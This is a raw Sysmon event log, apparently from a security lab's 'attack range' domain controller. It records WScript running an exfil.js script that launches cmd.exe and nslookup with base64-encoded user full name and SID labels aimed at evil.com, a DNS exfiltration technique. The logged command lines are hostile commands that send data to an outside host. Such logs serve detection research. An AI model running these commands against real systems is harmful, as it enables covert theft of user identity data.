14:16:16.827{2E1864BB-17B0-629A-CC3E-000000005F02}23087076C:\Windows\system32\cmd.exe{2E1864BB-17B0-629A-CE3E-000000005F02}5776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.836{2E1864BB-17B0-629A-CE3E-000000005F02}5776C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B0-629A-CC3E-000000005F02}2308C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqhovqp.tmp 2>&1 10341000x8000000000000000196596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.805{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-CD3E-000000005F02}4012C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.805{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-CD3E-000000005F02}4012C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.793{2E1864BB-17B0-629A-CD3E-000000005F02}40124572C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-CC3E-000000005F02}2308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.759{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-CD3E-000000005F02}4012C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.743{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-CC3E-000000005F02}2308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.743{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.743{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.743{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.743{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.743{2E1864BB-17A1-629A-783D-000000005F02}55523448C:\Windows\System32\WScript.exe{2E1864BB-17B0-629A-CC3E-000000005F02}2308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.747{2E1864BB-17B0-629A-CC3E-000000005F02}2308C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqhovqp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.727{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqqvt.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.690{2E1864BB-17B0-629A-CA3E-000000005F02}37967272C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-CB3E-000000005F02}4100C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.674{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.674{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.674{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.674{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.674{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-CB3E-000000005F02}4100C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.674{2E1864BB-17B0-629A-C93E-000000005F02}73723288C:\Windows\system32\cmd.exe{2E1864BB-17B0-629A-CB3E-000000005F02}4100C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.684{2E1864BB-17B0-629A-CB3E-000000005F02}4100C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B0-629A-C93E-000000005F02}7372C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqqvt.tmp 2>&1 354300x8000000000000000196576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52348- 354300x8000000000000000196575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52347- 354300x8000000000000000196574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52346- 354300x8000000000000000196573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.199{00000000-0000-0000-0000-000000000000}8012<unknown process>-udptruefalse127.0.0.1-52346-false127.0.0.1-53domain 354300x8000000000000000196572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.106{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52345- 354300x8000000000000000196571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.106{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52344- 354300x8000000000000000196570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.106{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse